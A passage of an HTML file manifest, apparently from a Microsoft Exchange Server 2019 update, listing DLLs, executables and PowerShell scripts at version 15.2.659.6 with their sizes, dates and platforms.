21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.decisionengine.dll</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>15.2.659.6</td><td>4,183,944</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dsapiclient.dll</td><td>15.2.659.6</td><td>182,144</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>15.2.659.6</td><td>121,728</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.extensibility.dll</td><td>15.2.659.6</td><td>403,848</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.extensibilityeventlog.dll</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.flighting.dll</td><td>15.2.659.6</td><td>89,992</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.dll</td><td>15.2.659.6</td><td>88,968</td><td>12-Aug
-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>15.2.659.6</td><td>68,480</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.loggingcommon.dll</td><td>15.2.659.6</td><td>63,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.monitoring.dll</td><td>15.2.659.6</td><td>430,472</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.net.dll</td><td>15.2.659.6</td><td>122,248</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.contracts.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.dll</td><td>15.2.659.6</td><td>29,064</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.httpsubmission.dll</td><td>15.2.659.6</td><td>60,808</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.requestbroker.dll</td><td>15.2.659.6</td><td>50,056</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.contracts.dll</td><td>15.2.659.6</td><td>33,160</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.dll</td><td>15.2.659.6</td><td>113,032</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.smtpshared.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.contracts.dll</td><td>15.2.659.6</td><td>52,096</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.dll</td><td>15.2.659.6</td><td>675,200</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.management.dll</td><td>15.2.659.6</td><t
d>23,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.agents.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>15.2.659.6</td><td>487,296</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.dll</td><td>15.2.659.6</td><td>306,048</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.eventlog.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.migrationrpc.dll</td><td>15.2.659.6</td><td>46,464</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>15.2.659.6</td><td>1,044,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportsyncmanagersvc.exe</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>15.2.659.6</td><td>118,664</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>15.2.659.6</td><td>924,544</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>15.2.659.6</td><td>1,466,760</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umvariantconfiguratio
n.dll</td><td>15.2.659.6</td><td>32,648</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.dll</td><td>15.2.659.6</td><td>41,856</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.exchange.dll</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesync.eventlog.dll</td><td>15.2.659.6</td><td>15,224</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesyncservicelet.dll</td><td>15.2.659.6</td><td>83,328</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicysyncservicelet.dll</td><td>15.2.659.6</td><td>50,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.antispam.dll</td><td>15.2.659.6</td><td>642,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.core.dll</td><td>15.2.659.6</td><td>186,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.dll</td><td>15.2.659.6</td><td>67,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.eventlog.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.variantconfiguration.excore.dll</td><td>15.2.659.6</td><td>56,704</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.globalsettings.dll</td><td>15.2.659.6</td><td>27,528</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.hygiene.dll</td><td>15.2.659.6</td><td>120,712</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.protectionservice.dll</td><td>15.2.659.6</td><td>31,624</td><td>12-Aug-2020</td><td>
21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.threatintel.dll</td><td>15.2.659.6</td><td>57,216</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.auth.dll</td><td>15.2.659.6</td><td>35,712</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.dll</td><td>15.2.659.6</td><td>1,054,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.xrm.dll</td><td>15.2.659.6</td><td>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.wlmservicelet.dll</td><td>15.2.659.6</td><td>23,424</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.wopiclient.dll</td><td>15.2.659.6</td><td>77,184</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingset.signalapi.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingsetabstraction.signalapiabstraction.dll</td><td>15.2.659.6</td><td>29,056</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.dll</td><td>15.2.659.6</td><td>505,216</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.eventlogs.dll</td><td>15.2.659.6</td><td>14,720</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.configuration.dll</td><td>15.2.659.6</td><td>36,744</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.dll</td><td>15.2.659.6</td><td>66,432</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.fast.contextlogger.json.dll</td><td>15.2.659.6</td><td>19,328</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.filtering.dll</td><td>15.2.659.6</td><td>113,024</td><td>12-Aug-2020</td><td>21:25</td>
<td>x86</td></tr><tr><td>Microsoft.filtering.exchange.dll</td><td>15.2.659.6</td><td>57,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.filtering.interop.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.dll</td><td>15.2.659.6</td><td>46,976</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.eventlog.dll</td><td>15.2.659.6</td><td>15,744</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.forefront.filtering.common.dll</td><td>15.2.659.6</td><td>23,936</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.diagnostics.dll</td><td>15.2.659.6</td><td>22,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.eventpublisher.dll</td><td>15.2.659.6</td><td>34,696</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.forefront.management.powershell.format.ps1xml</td><td>Not applicable</td><td>48,902</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.management.powershell.types.ps1xml</td><td>Not applicable</td><td>16,278</td><td>12-Aug-2020</td><td>21:25</td><td>Not 
applicable</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.dll</td><td>15.2.659.6</td><td>1,518,984</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.messages.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.forefront.monitoring.management.outsidein.dll</td><td>15.2.659.6</td><td>33,160</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.forefront.recoveryactionarbiter.contract.dll</td><td>15.2.659.6</td><td>18,296</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.common.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.ondemandquery.dll</td><td>15.2.659.6</td><td>50,568</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.collections.dll</td><td>15.2.659.6</td><td>72,576</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.interop.dll</td><td>15.2.659.6</td><td>541,576</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.managementgui.dll</td><td>15.2.659.6</td><td>133,504</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.mce.interop.dll</td><td>15.2.659.6</td><td>24,448</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.audit.dll</td><td>15.2.659.6</td><td>124,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.client.discovery.unifiedexport.dll</td><td>15.2.659.6</td><td>593,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.common.ipcommonlogger.dll</td><td>15.2.659.6</td><td>42,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.core.dll</td><td>15.2.659.6</td><td>217,992</td><td>12-Aug-2020</td><td>21:26</td>
<td>x86</td></tr><tr><td>Microsoft.office.compliance.console.dll</td><td>15.2.659.6</td><td>854,912</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.extensions.dll</td><td>15.2.659.6</td><td>485,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.core.dll</td><td>15.2.659.6</td><td>413,056</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.ingestion.dll</td><td>15.2.659.6</td><td>36,224</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.exchange.dar.dll</td><td>15.2.659.6</td><td>84,856</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.platform.dll</td><td>15.2.659.6</td><td>1,782,152</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.common.dll</td><td>15.2.659.6</td><td>49,536</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.dll</td><td>15.2.659.6</td><td>27,512</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoringlocal.dll</td><td>15.2.659.6</td><td>174,976</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.monitoring.activemonitoring.recovery.dll</td><td>15.2.659.6</td><td>166,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office365.datainsights.uploader.dll</td><td>15.2.659.6</td><td>40,320</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.online.box.shell.dll</td><td>15.2.659.6</td><td>46,464</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>15.2.659.6</td><td>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>15.2.659.6</td><td
>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.tailoredexperiences.core.dll</td><td>15.2.659.6</td><td>120,192</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>19,110</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Modernpublicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>29,052</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>61,116</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>30,590</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Move_publicfolderbranch.ps1</td><td>Not applicable</td><td>17,520</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Mpgearparser.dll</td><td>15.2.659.6</td><td>99,720</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Msclassificationadapter.dll</td><td>15.2.659.6</td><td>248,712</td><td>12-Aug-2020</td><td>21:28</td><td>x64</td></tr><tr><td>Msexchangecompliance.exe</td><td>15.2.659.6</td><td>78,728</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangedagmgmt.exe</td><td>15.2.659.6</td><td>25,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangedelivery.exe</td><td>15.2.659.6</td><td>38,784</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangefrontendtransport.exe</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangehmhost.exe</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangehmrecovery.exe</td><td>15.2.659.6</td><td>29,576</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>15.2.659.6</td><td>72,584</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr>
<tr><td>Msexchangemailboxreplication.exe</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangemigrationworkflow.exe</td><td>15.2.659.6</td><td>69,000</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangerepl.exe</td><td>15.2.659.6</td><td>71,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangesubmission.exe</td><td>15.2.659.6</td><td>123,264</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangethrottling.exe</td><td>15.2.659.6</td><td>39,808</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangetransport.exe</td><td>15.2.659.6</td><td>74,112</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangetransportlogsearch.exe</td><td>15.2.659.6</td><td>139,136</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Msexchangewatchdog.exe</td><td>15.2.659.6</td><td>55,680</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Mspatchlinterop.dll</td><td>15.2.659.6</td><td>53,640</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Nativehttpproxy.dll</td><td>15.2.659.6</td><td>91,520</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Navigatorparser.dll</td><td>15.2.659.6</td><td>636,800</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Nego2nativeinterface.dll</td><td>15.2.659.6</td><td>19,328</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Negotiateclientcertificatemodule.dll</td><td>15.2.659.6</td><td>30,080</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Newtestcasconnectivityuser.ps1</td><td>Not applicable</td><td>19,752</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuserhosting.ps1</td><td>Not applicable</td><td>24,567</td><td>12-Aug-2020</td><td>21:26</td><td>Not 
applicable</td></tr><tr><td>Ntspxgen.dll</td><td>15.2.659.6</td><td>80,768</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Oleconverter.exe</td><td>15.2.659.6</td><td>173,960</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Outsideinmodule.dll</td><td>15.2.659.6</td><td>87,944</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Owaauth.dll</td><td>15.2.659.6</td><td>92,032</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Perf_common_extrace.dll</td><td>15.2.659.6</td><td>245,128</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Perf_exchmem.dll</td><td>15.2.659.6</td><td>86,408</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Pipeline2.dll</td><td>15.2.659.6</td><td>1,454,472</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Preparemoverequesthosting.ps1</td><td>Not applicable</td><td>70,983</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Prepare_moverequest.ps1</td><td>Not applicable</td><td>73,217</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Productinfo.managed.dll</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Proxybinclientsstringsdll</td><td>15.2.659.6</td><td>924,544</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Publicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>23,226</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Quietexe.exe</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Redistributeactivedatabases.ps1</td><td>Not applicable</td><td>250,572</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Reinstalldefaulttransportagents.ps1</td><td>Not applicable</td><td>21,643</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Remoteexchange.ps1</td><td>Not 
applicable</td><td>23,561</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Removeuserfrompfrecursive.ps1</td><td>Not applicable</td><td>14,672</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Replaceuserpermissiononpfrecursive.ps1</td><td>Not applicable</td><td>14,990</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Replaceuserwithuseronpfrecursive.ps1</td><td>Not applicable</td><td>15,000</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Replaycrimsonmsg.dll</td><td>15.2.659.6</td><td>1,104,776</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Resetattachmentfilterentry.ps1</td><td>Not applicable</td><td>15,464</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Resetcasservice.ps1</td><td>Not applicable</td><td>21,695</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Reset_antispamupdates.ps1</td><td>Not applicable</td><td>14,089</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Restoreserveronprereqfailure.ps1</td><td>Not applicable</td><td>15,129</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Resumemailboxdatabasecopy.ps1</td><td>Not applicable</td><td>17,198</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Rightsmanagementwrapper.dll</td><td>15.2.659.6</td><td>86,400</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Rollalternateserviceaccountpassword.ps1</td><td>Not applicable</td><td>55,778</td><td>12-Aug-2020</td><td>21:27</td><td>Not 
applicable</td></tr><tr><td>Rpcperf.dll</td><td>15.2.659.6</td><td>23,424</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Rpcproxyshim.dll</td><td>15.2.659.6</td><td>39,296</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Rulesauditmsg.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Safehtmlnativewrapper.dll</td><td>15.2.659.6</td><td>34,696</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Scanenginetest.exe</td><td>15.2.659.6</td><td>956,296</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Scanningprocess.exe</td><td>15.2.659.6</td><td>739,208</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Searchdiagnosticinfo.ps1</td><td>Not applicable</td><td>16,800</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Servicecontrol.ps1</td><td>Not applicable</td><td>52,317</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Setmailpublicfolderexternaladdress.ps1</td><td>Not applicable</td><td>20,742</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Settingsadapter.dll</td><td>15.2.659.6</td><td>116,096</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Setup.exe</td><td>15.2.659.6</td><td>20,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Setupui.exe</td><td>15.2.659.6</td><td>188,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Split_publicfoldermailbox.ps1</td><td>Not applicable</td><td>52,177</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Startdagservermaintenance.ps1</td><td>Not applicable</td><td>27,851</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Statisticsutil.dll</td><td>15.2.659.6</td><td>142,216</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Stopdagservermaintenance.ps1</td><td>Not applicable</td><td>21,121</td><td>12-Aug-2020</td><td>21:25</td><td>Not 
applicable</td></tr><tr><td>Storetsconstants.ps1</td><td>Not applicable</td><td>15,818</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Storetslibrary.ps1</td><td>Not applicable</td><td>27,991</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Store_mapi_net_bin_perf_x64_exrpcperf.dll</td><td>15.2.659.6</td><td>28,552</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Sync_mailpublicfolders.ps1</td><td>Not applicable</td><td>43,915</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Sync_modernmailpublicfolders.ps1</td><td>Not applicable</td><td>43,961</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Textconversionmodule.dll</td><td>15.2.659.6</td><td>86,408</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Troubleshoot_ci.ps1</td><td>Not applicable</td><td>22,715</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databaselatency.ps1</td><td>Not applicable</td><td>33,421</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databasespace.ps1</td><td>Not applicable</td><td>30,017</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Uninstall_antispamagents.ps1</td><td>Not applicable</td><td>15,477</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Updateapppoolmanagedframeworkversion.ps1</td><td>Not applicable</td><td>14,018</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Updatecas.ps1</td><td>Not applicable</td><td>35,786</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Updateconfigfiles.ps1</td><td>Not applicable</td><td>19,730</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Updateserver.exe</td><td>15.2.659.6</td><td>3,014,528</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Update_malwarefilteringserver.ps1</td><td>Not 
applicable</td><td>18,144</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Web.config_053c31bdd6824e95b35d61b0a5e7b62d</td><td>Not applicable</td><td>31,813</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Wsbexchange.exe</td><td>15.2.659.6</td><td>125,320</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>X400prox.dll</td><td>15.2.659.6</td><td>103,296</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>_search.lingoperators.a</td><td>15.2.659.6</td><td>34,688</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>_search.lingoperators.b</td><td>15.2.659.6</td><td>34,688</td><td>12-Aug-2020</td><td>21:26</td><td>Not 